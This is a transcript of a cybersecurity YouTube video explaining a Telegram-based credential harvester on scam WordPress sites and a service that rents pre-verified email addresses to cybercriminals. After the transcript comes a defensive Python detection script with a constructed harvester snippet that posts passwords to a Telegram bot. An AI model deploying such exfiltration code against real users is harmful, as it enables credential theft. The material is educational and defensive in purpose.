Now Scammers Can RENT Email Addresses for Cybercrime

Captions
These are scam websites that have been taken down by an administrator at a WordPress hosting provider in the last year. These are fake websites with a login form to either collect and harvest credentials like a username or password, or set up fake donation pages where it can scam and grift for money. Right off the tails of yesterday's video, where we got to dive into a phishing email that had a fake online Microsoft cloud or O365 login that would harvest credentials and send it to a compromised WordPress website, this individual reached out to me over email and said, hey, check it out, this is some of the back-end stuff that we tend to see at these WordPress hosting providers, how scammers retrieve and exfiltrate credentials. Now, I am super duper grateful for this individual sharing this with me. I thought it was really cool to be able to see behind the scenes, pull back the curtain, and I asked, hey, are you comfortable with me showcasing this in a video? And again, thank you, they said of course, absolutely.

So these are some of the commands that they ran on their server. We can see sort of like a bash Linux prompt here, maybe the hostname, game under WordPress and code for that specific instance or website. They're listing out the files in the current directory, and of course a regular index.html page, or maybe a fake PIN code authentication like multi-factor authentication, the zip file for presumably the whole website itself, and other content, but ultimately a telegram.js file. You can probably see where we're going with this. This telegram.js file is JavaScript code, or code that may usually run client-side when your web browser like Firefox or Google Chrome renders a page inside of the web browser, and it will just dynamically execute other code to make other requests or to interact with other parts of the page or other websites. Or it can be run server-side with like Node.js or Express as a web application framework, but in this case it looks like the syntax indicates it is running as client-side code, which is odd to me, because look, they straight up store a Telegram bot ID for the bot, the robot, the account that they're going to automate sending and exfiltrating credentials like stolen username and password to a specific chat or one location across Telegram, and all that messaging that it makes sense of. With the ready function they go ahead and retrieve a couple variables that they've already declared and retrieve them from IDs or values set in the HTML of the web page, and they start to build out a message that concatenates all this together, like the user that's provided, their password that they supplied, and the IP address that they're coming from. We set this up in local storage, and then ultimately there is a sender function where, hey, once the page is ready, we've collected and stored all of those credential variables that we want to work with. We take a couple settings where we say, look, let's do an asynchronous request, cross domain doesn't matter to me, but I want to use the Telegram API to retrieve a unique specific bot. Of course, this is the threat actor, this is the hacker, this is the scammer setting up their Telegram bot and sending a message, posting with all the data that they've just stolen, retrieved as part of that message variable. Easy enough. They end up just sending it, doing what they do, and redirecting with the little location.href. Interesting, they do another bit here; I presume, hey, this ready one might again just be for a PIN or a multi-factor authentication thing that they're trying to fake, and they do this all over again. Hey, another sender-one function where they concatenate in their Telegram bot ID and send along the message for the access. But this is pretty cut and dry, right? Like, you know how a credential harvester works, I'm sure we've seen these all over the place before, and that might be nothing new to you. But this WordPress administrator clued me in on something really cool that I haven't seen or heard of before, probably because it's just so dang recent.

Oh, actually, while we've been doing a little bit of code review, digging into the syntax, digging into this JavaScript language, I think it would be appropriate, and please allow me to give some love and support to today's sponsor, Snyk. I'll be honest, I write bad code. Even though I try to hunt for vulnerabilities in lots of other software, I still have vulnerabilities even in my own projects. Everyone does, and that's why I use Snyk to scan for vulnerabilities in code, dependencies, containers and configuration files, and Snyk helps find and fix those vulnerabilities in real time. You can try it and see for yourself. You can sign up for free with my link below, import your repositories, and sit back and let Snyk do the work for you. It'll find the flaws and vulnerabilities in your own applications. Check out this prototype pollution vulnerability that Snyk uncovered. We can see more details about the code path to introduce this vulnerability, and even learn more about this kind of vulnerability or any others if you check out the Snyk Learn lesson. I've referenced the Snyk Learn lessons and their vulnerability database a ton, especially in assessments and penetration testing, and even during Capture the Flag competitions. From there you can see an explanation of a flaw, proof-of-concept exploit code and attack demonstrations, and most importantly, how to mitigate this vulnerability. But the best part: Snyk helps you fix this vulnerability with a single click. It'll automatically open a pull request so you can just merge and move on. So seriously, check out Snyk. It's crazy how many vulnerabilities could be affecting your projects and you don't even realize. Take advantage of the resources and learning material and learn all about the different vulnerabilities out there. It's completely free and you can sign up right now with my link in the video description. Huge thanks to Snyk for sponsoring this video.

They told me that these scammers and credential harvesters will sign up for 20 or 80 or hundreds and tons of websites a day with their free trial, so that they can mass deploy tons of these bots or credential harvesters and keep up the campaign. But the way that they do that is by bypassing a lot of the email verification or CAPTCHA mechanisms that are put in place, with some sweet potential new services that really help that out. And they referenced this article from Brian Krebs, one of the other cybersecurity reporters, and he was chatting about, on June 6th, very very recent: one of the most expensive aspects of any cybercriminal operation is the time and effort it takes to constantly create large numbers of new throwaway email accounts so we can rapidly sign up for online services like Facebook, LinkedIn, I don't know, of course Telegram, right? But a new service offers to help dramatically cut these costs associated with this large-scale mass spam and account creation campaigns, just pressing the easy button so that they can do more damage as cybercriminals, as scammers, as hackers and threat actors. They note this new thing, kopeechka.store, is a sort of unidirectional email confirmation-as-a-service that says, hey, we'll speedrun this whole thing for you. Of course it's sold as a, hey, business operations something-as-a-service that is managed for you, and it's meant to be easy peasy. It's supposed to take all the hard work out for you. The way that this works is that Kopeechka collects, archives and offers multiple email addresses that have already been validated, and when you select or choose one to use for your own bidding, you'll specify with whatever API keys and tokens, like, hey, I want this one and I'm going to use it for this website or service, like Twitter or Mastodon, VK, anything, and then Kopeechka will match whatever new confirmation links or validation or verification comes through and it will forward it along to your provided gateway. This way Kopeechka customers never get access to the original real raw email, their inbox, but they can forward anything that they want into their own, in control. With that, Kopeechka can rent out whatever email addresses they want to multiple customers.

The thing is, this is very common, like this is the norm. They talk about this one case study with, quote, PW, who was mass registering accounts on Mastodon, in this case, uh, another online service like Twitter or whatever. They were, when we had the giant Twitter exodus and everyone went to Mastodon, you know the drill. But they're chatting about, like, hey, suddenly there were hundreds of account creations, new registrations, new sign-ups, and this is all coming from, quote, pwspam.net, which was since released as open source, like apparently they just put it out on GitHub, and that was an API call to Kopeechka's service. They chat about this a little bit more, and that some other case studies were using, I don't know, scams, would be able to help promote cryptocurrency and all of the other shenanigans that come from that, and of course scamdoc.com on their website that mimics the legitimate scamdoc.com, for measuring the trustworthiness and authenticity of various websites; that is just another hook and lure and ploy and lie and deception. A really interesting tidbit here: hey, they note, according to the FBI, the Federal Bureau of Investigation, financial losses from cryptocurrency investments dwarfed losses for all other types of cybercrime in 2022, rising from 907 million in 2021 to two and a half billion dollars last year. This is that link to the FBI's report on that. This is coming from March of 2023, and it's kind of wild to see these numbers between business email compromise, investment fraud, tech support, like, hey, you get some email from Best Buy and Geek Squad saying you need to update your antivirus, crap like that. You could dig into more of the report here if you wanted to, but it is just mind-blowing to me, and it's crazy how turnkey this has all become.

And in case you're curious, this is Kopeechka, this is the kopeechka.store. Uh, hey, okay, automatically detecting the language here for me: save your time and money for successfully registering multiple accounts, so you can do more damage. And this is exactly the screenshot that Brian Krebs has included. Hey, hey, this is the about us and what we offer: we provide email accounts, supply unique photos and issue phone numbers for registration, so you can have the easy button for mass sign-up of anything, accounts, new registrations for any website you might want, whether it's Telegram, whether it's these WordPress hosting providers, whether it's YouTube, whether it's VK, whether it is Mastodon, all of these, with of course testimonials and reviews and everything that is genuinely in a real business, because that's what it is. It is a commoditized enterprise, industry and marketplace for cybercrime, man. Now I'm not gonna sign up for kopeechka.store right now, but hey, I would love to maybe ask for an exercise to the reader, especially, I don't know, maybe some of the Telegram bot stuff here. Is there anything more that you might be able to dig into about this unique specific Telegram bot? Can we track down all the shenanigans that they're up to? Maybe we could get a little bit more details on what their operation might be. What could we do to better security here? Hey, huge kudos to the individual that had reached out, thank you so much, and especially thank you to the administrator for this WordPress hosting provider and all of the administrators for WordPress hosting providers. You are literally doing the internet the greatest service in locking this stuff down, trying to go out and fight the good fight here. They say, look, they're hosting tens of thousands of websites every day, and when just we're playing whack-a-mole with these spam accounts that are rapidly being created, it is a valued effort, and thank you for doing it. With that, it's up to us to keep getting this education and awareness and messaging out there so that folks are aware and we can fight the good fight just as well, get in the front lines, be in the trenches, and maybe do anything that we can about these Telegram bots, credential harvesting, better security. Thanks so much for watching. I hope you enjoyed this video. I thought it was kind of neat to get a look behind the curtain, and thanks again to all the folks that were willing to do this and help out. Like, comment, subscribe, YouTube algorithm stuff. I'll see you in the next video.
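One defensive use of the pattern the video walks through, as an added example that is not code from the video or from the hosting administrator: a Python triage script that scores JavaScript files on the indicators described above (a hard-coded Telegram bot token, the api.telegram.org/bot.../sendMessage call, reads of a password field, localStorage staging and a location.href redirect) so a hosting admin can flag likely harvester kits for review. The indicator weights, the threshold and the two sample snippets are constructed assumptions, not values taken from the real kit.

```python
"""Heuristic triage for the Telegram credential-harvester pattern from the video (added example, not the video's code)."""
import re
from pathlib import Path

# (name, regex, weight). Weights are a judgement call for triage, not proof.
INDICATORS = [
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot", re.I), 4),
    ("bot_token_literal", re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{30,}"), 3),
    ("send_message", re.compile(r"sendMessage"), 2),
    ("password_read", re.compile(r"\b(?:password|passwd|pwd|pass)\b", re.I), 2),
    ("local_storage", re.compile(r"localStorage\.(?:set|get)Item"), 1),
    ("redirect", re.compile(r"(?:window\.)?location\.href\s*="), 1),
    ("cross_domain", re.compile(r"crossDomain\s*:\s*true"), 1),
]
SUSPICIOUS_THRESHOLD = 8  # roughly: bot URL + token + sendMessage, or bot URL + password + staging

def score_js(source: str) -> tuple[int, list[str]]:
    """Return (score, names of matched indicators) for one JS source string."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    return sum(w for name, _, w in INDICATORS if name in hits), hits

def is_harvester(source: str) -> bool:
    """Flag only when the Telegram bot URL is present; the other indicators are common in benign front-end code."""
    score, hits = score_js(source)
    return "telegram_bot_api" in hits and score >= SUSPICIOUS_THRESHOLD

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map each flagged .js file under root to its matched indicator names."""
    flagged = {}
    for path in root.rglob("*.js"):
        text = path.read_text(errors="ignore")
        if is_harvester(text):
            flagged[str(path)] = score_js(text)[1]
    return flagged

# Constructed samples. The token is a placeholder, not a real bot, and the snippet is not functional.
HARVESTER_SAMPLE = """
var bot = "0000000000:PLACEHOLDERxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$(document).ready(function(){
  localStorage.setItem("m", $("#username").val() + "|" + $("#password").val());
  $.ajax({crossDomain:true, url:"https://api.telegram.org/bot"+bot+"/sendMessage",
          data:{text: localStorage.getItem("m")}});
  location.href = "https://example.com/";
});
"""
BENIGN_SAMPLE = """
$(document).ready(function(){
  if ($("#password").val().length < 8) { showError("password too short"); }
  localStorage.setItem("theme", "dark"); });
"""
```

Run `scan_tree(Path("/path/to/site"))` on a suspect document root; a hit is a prompt for manual review, since the weights are heuristic.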
Info
Channel: John Hammond
Views: 37,339
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: O36COhOWFg0
Length: 11min 30sec (690 seconds)
Published: Fri Jun 09 2023